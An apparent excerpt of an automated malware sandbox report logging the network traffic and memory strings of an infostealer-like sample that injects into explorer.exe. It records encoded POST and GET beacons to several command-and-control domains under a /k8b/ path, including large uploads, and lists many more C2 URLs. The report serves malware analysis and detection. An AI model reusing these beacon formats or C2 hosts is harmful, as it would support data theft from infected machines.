61 55 6b 44 43 68 76 4e 47 47 46 48 62 72 61 42 4d 54 39 35 5a 58 4c 30 70 4f 79 33 46 6e 45 4f 70 72 6a 57 65 45 73 73 74 38 76 51 70 52 46 49 6f 30 70 73 6b 56 50 6d 58 56 78 6a 67 51 62 44 6b 33 47 53 51 38 43 75 64 4e 66 34 6d 63 65 72 6d 6c 66 41 35 56 32 35 65 4d 42 53 37 6a 57 70 66 6b 6a 46 69 41 69 4f 56 58 32 56 39 56 34 75 79 6c 6a 74 4f 73 54 34 39 7e 31 57 42 41 55 56 2d 61 66 75 68 45 56 6e 54 63 38 65 38 79 75 70 33 43 4d 6c 71 7e 72 4e 46 5a 4f 30 66 59 36 6e 75 78 6e 6b 4e 50 42 33 70 49 35 79 78 4e 42 54 6c 47 58 44 36 51 71 38 56 7a 72 68 73 38 65 43 77 56 38 30 74 5a 50 6c 69 4f 67 71 42 51 30 6d 4d 70 55 6c 76 6e 6b 6a 57 4e 33 76 57 6c 30 76 53 62 49 73 5a 54 72 6a 46 78 78 64 35 59 4a 53 75 4c 56 71 75 64 4f 6e 4a 4c 77 6d 7a 52 4e 28 66 72 70 4a 2d 64 58 62 37 72 44 43 42 38 49 58 64 61 7a 62 50 6a 41 6d 63 6c 6a 56 33 28 6f 78 59 43 6f 7e 6b 75 49 70 46 4f 35 52 50 73 65 5a 39 41 4b 39 62 6e 6c 6c 79 38 74 37 42 53 47 44 54 6b 33 57 42 6f 5f 6f 36 44 4e 50 4d 38 6a 5a 47 6f 62 41 73 78 48 28 6
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.nastykiki.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.nastykiki.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nastykiki.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 5a 46 50 43 3d 64 67 33 54 28 61 78 57 50 54 66 62 32 48 58 4b 78 5a 63 74 44 34 76 6b 33 73 61 35 6b 33 55 76 48 51 39 46 77 48 49 76 4c 4c 41 49 51 6a 41 59 36 79 48 65 62 78 64 5f 51 4a 37 38 38 4e 43 65 7a 39 75 51 64 46 6a 51 41 56 57 64 59 67 32 68 4a 6d 7e 5f 61 6e 57 57 35 72 75 31 62 7a 4f 2d 6c 7a 34 69 4d 7a 61 75 31 2d 4a 72 4e 5f 33 43 6d 6e 31 6a 41 72 55 63 41 67 4e 4d 37 66 57 30 43 54 48 52 68 73 33 37 58 47 44 30 49 5a 48 59 41 39 30 46 71 34 56 64 42 6e 4d 4f 39 30 6a 4c 62 6a 35 64 41 61 44 77 4b 6c 74 39 65 48 57 69 76 77 6e 75 63 75 73 46 38 4b 54 6f 56 32 53 67 64 46 67 6b 39 69 56 41 54 38 48 34 7a 47 4b 6c 46 49 64 6e 45 57 31 59 74 2d 77 56 61 6d 55 5f 65 6e 4d 6b 34 46 38 5a 51 30 76 38 73 53 67 78 48 76 42 58 6b 70 33 65 51 4d 65 2d 41 7a 6f 41 5a 78 65 5f 32 59 65 62 42 48 41 66 74 47 56 70 44 5f 41 65 50 65 61 4a 5a 4a 34 30 78 5a 70 50 49 62 6d 34 56 7a 67 38 5a 79 5a 66 4f 48 72 44 28 36 46 70 64 49 50 54 50 54 4b 55 7e 71 4c 6d 42 73 42 4e 4d 6f 38 39 6c 4e 57 64 64 7a 44 36 4b 58 31 6a 79 76 30 33 28 36 59 76 4d 4c 45 61 69 5a 57 70 41 4c 70 78 67 57 58 2d 53 79 58 5a 7e 72 63 57 72 6b 44 64 4d 44 43 4f 4a 6e 54 72 65 51 31 7a 43 33 51 6d 4e 47 28 58 6b 52 37 64 6d 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
GZFPC=dg3T(axWPTfb2HXKxZctD4vk3sa5k3UvHQ9FwHIvLLAIQjAY6yHebxd_QJ788NCez9uQdFjQAVWdYg2hJm~_anWW5ru1bzO-lz4iMzau1-JrN_3Cmn1jArUcAgNM7fW0CTHRhs37XGD0IZHYA90Fq4VdBnMO90jLbj5dAaDwKlt9eHWivwnucusF8KToV2SgdFgk9iVAT8H4zGKlFIdnEW1Yt-wVamU_enMk4F8ZQ0v8sSgxHvBXkp3eQMe-AzoAZxe_2YebBHAftGVpD_AePeaJZJ40xZpPIbm4Vzg8ZyZfOHrD(6FpdIPTPTKU~qLmBsBNMo89lNWddzD6KX1jyv03(6YvMLEaiZWpALpxgWX-SyXZ~rcWrkDdMDCOJnTreQ1zC3QmNG(XkR7dmw).
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.nastykiki.comConnection: closeContent-Length: 186031Cache-Control: no-cacheOrigin: http://www.nastykiki.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nastykiki.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 5a 46 50 43 3d 64 67 33 54 28 62 49 6e 63 7a 62 47 39 55 7a 50 77 4e 41 31 53 4a 66 32 7a 76 66 7a 79 58 38 52 4b 6a 4a 76 77 47 34 72 54 36 52 50 58 44 77 59 38 30 62 5a 54 78 64 38 57 4a 37 5f 71 4e 50 68 76 64 32 6d 64 42 79 37 41 56 65 65 42 7a 7e 6b 49 32 7e 6b 62 48 71 41 37 72 37 6e 62 78 4c 65 6d 52 55 71 61 6a 57 75 78 4f 68 70 52 74 66 4a 76 47 70 6f 63 4b 35 59 43 67 55 63 6e 34 6d 6d 43 31 50 4a 78 35 54 35 51 33 6e 46 47 36 4f 46 58 38 38 4b 6b 49 42 61 66 78 64 43 7a 7a 54 50 57 42 51 67 46 59 72 7a 44 31 6c 30 55 6c 66 58 6b 6c 57 55 65 36 6f 76 38 4e 75 66 63 6c 47 39 58 6b 38 53 34 51 77 56 4c 64 53 2d 32 78 66 32 49 75 4a 30 43 58 45 36 68 63 6f 34 64 32 34 6d 54 43 4a 37 39 6b 6b 69 56 41 28 77 6e 43 77 4e 47 4d 74 6c 72 49 6d 70 64 72 44 6e 4f 48 59 32 63 7a 7a 44 37 59 65 34 48 48 41 62 31 42 68 52 47 4e 73 46 59 5f 71 6e 59 4b 59 67 37 71 74 4d 4c 5a 75 6b 4c 69 35 36 62 6a 42 54 45 55 53 6a 36 61 78 69 64 34 37 77 42 7a 4b 49 31 4a 69 4c 42 73 42 37 4d 70 39 71 71 63 43 64 64 69 50 70 49 32 31 56 35 50 30 50 7a 4b 49 78 56 4e 6f 4b 69 5a 65 70 42 35 78 66 68 68 7a 2d 46 54 48 61 7e 50 49 57 71 30 44 64 55 7a 44 6d 61 32 4b 68 61 43 77 45 52 45 67 49 50 54 7e 30 77 6c 79 6a 7e 6c 73 71 49 41 64 6b 30 33 52 64 63 65 5a 44 6d 36 55 6f 43 78 49 66 78 52 66 30 42 6a 72 4c 43 44 32 7a 59 42 59 30 59 71 69 54 41 67 68 44 4f 41 63 5f 53 41 68 53 6e 64 6b 71 4e 75 57 64 61 4f 39 2d 6e 30 41 4f 4b 4f 72 5a 6a 30 79 6b 44 50 33 77 37 5f 5a 53 65 70 39 4a 59 4b 79 48 28 38 30 67 69 36 65 4d 72 65 61 2d 78 58 6c 76 66 6b 33 
76 63 4e 66 48 4b 37 4b 33 50 30 39 33 6e 39 68 61 55 34 35 41 44 68 41 5a 50 48 51 49 33 39 68 75 41 6f 55 4d 62 48 28 54 76 67 46 4a 6f 30 46 4c 56 46 6e 31 4a 64 62 39 36 76 4f 4d 46 37 53 6d 37 65 67 76 51 65 78 37 50 32 37 47 35 62 30 54 49 4a 70 6f 6b 70 68 4b 59 6e 55 43 6d 4b 62 4f 76 39 4d 4a 51 6b 28 35 43 79 70 49 69 71 36 75 49 66 38 6b 76 78 4f 68 69 50 31 68 6b 41 66 30 34 32 5a 52 6d 66 6e 61 32 48 56 6b 4a 4d 4d 67 6e 74 63 53 38 67 7e 44 44 4d 58 48 35 44 76 32 77 78 67 55 76 5f 6d 74 55 44 4b 6b 45 65 66 31 56 57 67 65 6b 68 6b 44 45 52 4f 39 35 78 70 59 4c 79 72 6a 39 30 64 45 70 45 78 59 4c 52 57 61 72 39 57 78 4b 49 64 30 4d 52 66 32 7e 56 58 42 75 54 38 5a 79 49 38 71 39 79 64 6f 44 75 65 77 6e 59 50 45 4f 6f 28 36 55 6c 54 30 76 44 67 5a 48 43 35 2d 7a 43 73 6e 59 4a 35 50 46 39 78 71 4e 57 5a 6f 48 6e 62 39 62 59 4f 46 4b 57 66 6c 28 68 46 74 53 62 7a 46 47 41 4a 62 68 45 76 66 47 5f 52 74 7e 7a 33 70 53 68 70 45 69 55 45 49 4b 6b 6c 63 77 59 49 38 67 4f 59 63 42 78 36 4d 42 62 65 36 48 33 70 5
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.coin-1234.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.coin-1234.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.coin-1234.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 5a 46 50 43 3d 33 66 43 66 76 47 78 57 42 33 71 77 6e 6d 4d 6c 71 30 4a 72 31 49 58 59 4f 34 78 4a 55 69 6d 4b 70 51 76 6e 69 58 69 32 4b 76 6c 4e 72 56 4f 5f 47 34 73 73 77 53 5a 35 45 6b 28 44 55 42 76 75 4c 35 6c 62 53 43 74 43 58 30 28 72 34 6a 4e 6d 62 4b 6b 38 63 74 45 51 74 49 45 72 5a 4d 38 70 69 66 4a 5f 42 63 69 39 31 74 4b 63 4e 44 69 67 4b 72 32 6d 68 73 69 33 6a 72 79 7a 6a 50 44 32 35 43 71 50 44 37 54 2d 37 70 42 48 43 63 56 57 55 4c 72 47 48 5a 6d 32 58 79 65 74 35 4e 56 5f 73 77 73 74 58 31 78 39 67 30 76 54 57 6e 78 39 6a 53 70 58 65 77 42 5f 75 59 75 30 4d 75 69 2d 62 35 4d 38 4c 41 71 49 6e 46 55 48 57 70 48 71 7a 56 4a 6a 55 2d 33 58 35 45 66 52 70 4d 38 6c 67 4d 70 32 5a 70 62 66 30 75 49 61 6d 66 4d 64 4c 4c 74 6a 33 75 52 59 46 4b 46 53 39 4b 64 32 78 4f 6c 59 6f 73 59 68 69 76 76 6b 32 72 71 2d 6c 79 74 75 48 4d 59 63 52 63 59 4e 78 4e 49 68 56 5a 5a 47 4c 6e 76 65 63 62 33 68 75 47 6c 75 4b 41 72 31 77 6a 59 45 68 63 6e 67 79 4f 79 5f 52 33 65 4d 68 50 56 70 32 57 72 72 69 4b 43 66 76 39 63 48 34 39 68 4d 6c 71 45 61 39 4e 36 63 45 37 35 6a 4f 6c 46 50 46 47 6f 77 69 4c 32 59 31 4b 70 4f 78 45 67 67 52 64 65 5a 35 65 6c 66 6f 42 61 4d 79 43 6f 62 72 5f 51 63 54 43 72 76 53 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
GZFPC=3fCfvGxWB3qwnmMlq0Jr1IXYO4xJUimKpQvniXi2KvlNrVO_G4sswSZ5Ek(DUBvuL5lbSCtCX0(r4jNmbKk8ctEQtIErZM8pifJ_Bci91tKcNDigKr2mhsi3jryzjPD25CqPD7T-7pBHCcVWULrGHZm2Xyet5NV_swstX1x9g0vTWnx9jSpXewB_uYu0Mui-b5M8LAqInFUHWpHqzVJjU-3X5EfRpM8lgMp2Zpbf0uIamfMdLLtj3uRYFKFS9Kd2xOlYosYhivvk2rq-lytuHMYcRcYNxNIhVZZGLnvecb3huGluKAr1wjYEhcngyOy_R3eMhPVp2WrriKCfv9cH49hMlqEa9N6cE75jOlFPFGowiL2Y1KpOxEggRdeZ5elfoBaMyCobr_QcTCrvSQ).
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.coin-1234.comConnection: closeContent-Length: 186031Cache-Control: no-cacheOrigin: http://www.coin-1234.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.coin-1234.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 5a 46 50 43 3d 33 66 43 66 76 44 41 6c 41 48 75 74 6a 54 6b 67 71 6b 5a 6a 78 49 4b 42 4b 35 51 58 55 30 50 7a 71 44 62 33 69 55 4b 4d 47 4b 4a 6c 76 31 65 5f 45 36 45 76 35 53 5a 36 4e 45 28 63 47 78 79 58 52 75 78 41 53 44 6f 4b 58 30 48 6f 79 46 49 4e 62 61 6b 72 64 4e 4a 6a 36 62 34 4f 5a 50 59 41 6a 35 6f 36 52 4d 7e 39 78 64 69 65 52 32 28 79 44 50 65 70 68 63 7e 79 68 71 4c 6c 6b 5f 28 43 34 68 57 39 56 71 50 38 28 62 64 79 62 35 63 42 44 4d 58 5a 4c 70 79 39 59 52 69 2d 38 71 39 7a 74 79 56 4e 5a 55 77 50 38 30 6e 61 42 67 31 31 6e 6e 5a 75 53 41 78 72 75 62 4f 4f 49 64 33 6d 66 5f 4a 78 4e 79 65 75 7a 67 30 46 54 65 71 74 33 54 6c 65 50 5f 47 44 32 68 37 57 7e 74 42 78 6a 4b 6b 72 58 73 33 73 79 66 30 73 7e 61 77 4c 4b 73 31 56 6f 2d 68 33 4a 72 63 51 79 4c 39 75 79 4e 49 35 73 38 5a 6f 67 76 76 53 7e 35 79 47 67 44 35 70 44 63 70 5f 51 64 52 58 31 64 6b 67 57 62 52 6b 47 6d 72 50 61 71 76 39 67 57 31 61 5a 51 28 71 77 51 46 36 34 4d 6e 6b 6e 39 62 7a 52 33 66 33 68 4f 56 51 31 44 4c 72 6a 59 61 41 69 36 49 78 6f 4e 67 4a 6d 35 73 63 30 65 75 71 45 37 68 6a 50 56 55 55 58 42 38 77 70 4a 7e 62 31 72 70 4f 79 30 67 67 59 39 66 2d 34 63 59 4a 70 67 75 75 79 7a 4d 77 67 59 39 72 66 79 47 4b 4e 6a 42 46 42 65 6c 49 30 57 6f 67 6b 76 32 68 6c 4a 6e 6c 61 77 62 43 28 6f 41 2d 44 57 59 6a 47 7a 4a 6d 66 5a 35 4f 42 52 73 45 75 77 56 4b 4f 49 63 44 75 7a 30 77 4b 6b 55 4e 79 4c 51 36 73 4c 4b 64 70 7a 35 53 4a 4c 43 32 4c 4b 71 73 6a 78 6a 4c 6d 68 49 48 58 42 38 4b 6c 65 47 49 6f 57 56 31 28 63 72 66 45 33 53 6c 42 65 69 6b 30 4c 7a 
6c 64 48 6b 5a 7a 62 4e 4f 4a 75 50 67 36 37 39 47 47 33 72 55 4e 46 4e 49 71 5a 4a 49 65 6e 79 36 6d 61 75 39 73 6c 36 5a 67 6a 33 77 78 6b 43 76 65 56 56 51 34 43 61 73 72 33 66 37 46 48 7e 38 59 78 69 75 56 75 4a 2d 49 30 4e 47 37 53 4d 75 76 58 72 68 68 42 44 42 32 75 4b 79 53 6f 36 47 7e 45 42 77 51 37 50 41 59 6d 67 63 44 79 53 32 4f 38 4f 78 6a 42 52 73 59 32 76 33 7a 50 53 41 4e 58 59 7a 68 53 7e 58 55 6b 37 58 7e 45 6e 45 32 68 49 70 43 54 61 52 4c 47 76 39 70 75 54 52 72 49 37 6b 31 47 4d 5f 6f 32 43 46 7e 51 4f 65 4c 75 6b 57 6f 62 4b 55 41 49 4c 30 7a 5f 4b 64 67 66 32 52 6d 61 79 7a 4d 79 49 62 7e 34 62 34 56 39 6a 6d 45 66 56 43 36 61 7e 67 4c 70 49 4e 47 30 46 78 64 48 4a 75 57 64 36 46 34 68 75 64 4d 38 61 76 61 45 7e 65 35 55 59 33 6a 53 77 50 57 42 79 32 54 4d 58 6b 4f 53 74 31 34 45 4a 42 76 6d 78 66 47 58 66 42 37 4e 7e 39 41 7a 58 68 5a 5f 73 61 7a 64 28 68 4f 54 7a 4b 43 53 7e 6f 32 44 6e 6d 41 4f 68 65 42 6c 4f 67 6d 75 56 6a 47 50 66 56 7e 43 56 78 30 43 30 76 74 69 7e 74 51 38 31 77 52 43 79 6
          Source: global trafficHTTP traffic detected: GET /k8b/?GZFPC=l8hWUFLJuml4eYku4/VYU6RSnNDRvqfvURXgu3llAvj/NGacI/RacADph16unSeN08+r&Jzr=WbI4nLcxNx9xB HTTP/1.1Host: www.cloutmonk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?GZFPC=VC7ph94nBwHqpUSYspNTCN309MDkymEOcmQ6ikEgb4YKagxI1RKoe1AlMLDdw+SPwNPO&Jzr=WbI4nLcxNx9xB HTTP/1.1Host: www.nastykiki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?GZFPC=/9OlxiJfDFCR+kV/3jQOp8a9FKVAShy06VW92GW7Kq51jBaeGYNY0G4LSnjLLhaFT7RV&Jzr=WbI4nLcxNx9xB HTTP/1.1Host: www.coin-1234.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.cloutmonk.com
          Source: unknownHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.cloutmonk.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cloutmonk.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cloutmonk.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 5a 46 50 43 3d 74 65 74 73 4b 6c 76 44 6c 6e 68 34 4d 71 6c 63 6f 36 67 43 44 63 31 4f 78 65 62 46 6f 70 58 39 4b 46 47 5f 33 51 31 70 51 66 4f 39 4a 6b 4f 57 46 66 67 70 56 31 76 74 30 6e 4f 73 37 6d 32 49 79 65 65 6c 54 54 53 56 4b 6e 42 6a 6f 66 36 6e 4e 36 58 68 76 52 47 59 6d 6b 28 6b 51 68 4c 45 33 73 79 46 67 59 74 47 62 79 4a 4d 59 44 36 70 62 75 49 35 39 42 52 64 66 79 41 50 47 74 6f 4b 4d 5a 45 63 28 74 7e 62 77 48 68 51 45 59 62 58 48 78 35 6a 6b 53 74 7a 69 30 6e 36 32 77 50 75 69 73 6a 34 66 66 47 4e 59 66 47 72 45 62 73 51 54 53 30 6d 63 74 30 61 6c 36 72 79 68 6c 28 65 57 6f 30 6a 62 6d 50 70 54 49 33 32 75 55 6f 53 7a 73 5a 41 4f 72 79 62 36 51 39 73 47 6e 77 2d 39 32 74 77 58 46 37 79 75 7a 4b 6c 57 72 78 34 56 67 67 38 52 6c 57 73 6c 63 6e 76 38 42 6a 5f 61 63 66 7a 6d 69 45 67 6c 67 67 77 34 75 46 44 62 64 36 52 56 51 74 4a 54 69 50 62 4c 70 66 6a 6a 52 72 74 61 42 54 6f 6c 71 69 47 6f 53 67 78 6e 79 74 76 5a 32 58 45 62 79 68 32 42 6f 79 71 6b 70 7e 59 63 61 65 50 68 6f 43 31 45 77 6c 49 75 63 56 6b 33 79 58 4f 73 51 51 34 43 6c 6b 47 50 30 59 67 7e 50 4b 4e 62 45 78 43 65 4a 33 79 34 50 77 56 79 72 53 31 56 70 31 68 4f 4f 67 45 38 35 77 30 76 55 69 35 39 50 54 38 61 54 69 74 77 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
GZFPC=tetsKlvDlnh4Mqlco6gCDc1OxebFopX9KFG_3Q1pQfO9JkOWFfgpV1vt0nOs7m2IyeelTTSVKnBjof6nN6XhvRGYmk(kQhLE3syFgYtGbyJMYD6pbuI59BRdfyAPGtoKMZEc(t~bwHhQEYbXHx5jkStzi0n62wPuisj4ffGNYfGrEbsQTS0mct0al6ryhl(eWo0jbmPpTI32uUoSzsZAOryb6Q9sGnw-92twXF7yuzKlWrx4Vgg8RlWslcnv8Bj_acfzmiEglggw4uFDbd6RVQtJTiPbLpfjjRrtaBTolqiGoSgxnytvZ2XEbyh2Boyqkp~YcaePhoC1EwlIucVk3yXOsQQ4ClkGP0Yg~PKNbExCeJ3y4PwVyrS1Vp1hOOgE85w0vUi59PT8aTitwQ).
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sat, 12 Sep 2020 13:04:21 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 310 Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /k8b/ was not found on this server.</p><hr><address>Apache Server at <a href="mailto:admin@localhost.com">www.coin-1234.com</a> Port 80</address></body></html>
          Source: explorer.exe, 00000005.00000000.418438199.000000000E1E9000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.398404155.0000000006E30000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/DataSet1.xsd
          Source: explorer.exe, 00000005.00000002.631637082.0000000002280000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.aigou898.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.aigou898.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.aigou898.com/k8b/www.clickfeminino.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.aigou898.comReferer:
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.alriyadh-ksa.online
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.alriyadh-ksa.online/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.alriyadh-ksa.online/k8b/www.fivestarthestud.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.alriyadh-ksa.onlineReferer:
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.412362534.0000000007C99000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.camdio.xyz
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.camdio.xyz/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.camdio.xyz/k8b/Micr0
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.camdio.xyzReferer:
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.366937932.00000000052E4000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.366937932.00000000052E4000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.clickfeminino.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.clickfeminino.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.clickfeminino.com/k8b/www.p229pbfc9frm4.net
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.clickfeminino.comReferer:
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.cloutmonk.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.cloutmonk.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.cloutmonk.com/k8b/www.nastykiki.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.cloutmonk.comReferer:
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmp, NETSTAT.EXE, 0000000C.00000002.633735755.0000000003EE9000.00000004.00000001.sdmpString found in binary or memory: http://www.coin-1234.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmp, NETSTAT.EXE, 0000000C.00000002.633735755.0000000003EE9000.00000004.00000001.sdmpString found in binary or memory: http://www.coin-1234.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.coin-1234.com/k8b/www.aigou898.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.coin-1234.comReferer:
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.dancoimage.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.dancoimage.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.dancoimage.com/k8b/www.fundwise.pro
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.dancoimage.comReferer:
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.fivestarthestud.com
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.fivestarthestud.com/k8b/
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.fivestarthestud.com/k8b/www.camdio.xyz
          Source: explorer.exe, 00000005.00000003.549457851.000000000E1F8000.00000004.00000001.sdmpString found in binary or memory: http://www.fivestarthestud.comReferer:
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.394699051.00000000063F2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.415825218.000000000C230000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.393239530.00000000052EE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: vyac9eSGFdsBaas.exe, 00000000.00000002.393239530.00000000052EE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comaH
          Source: vyac9eSGFdsBaas.exe, 00000000.00000003.371673013.00000000052ED000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comlvfet
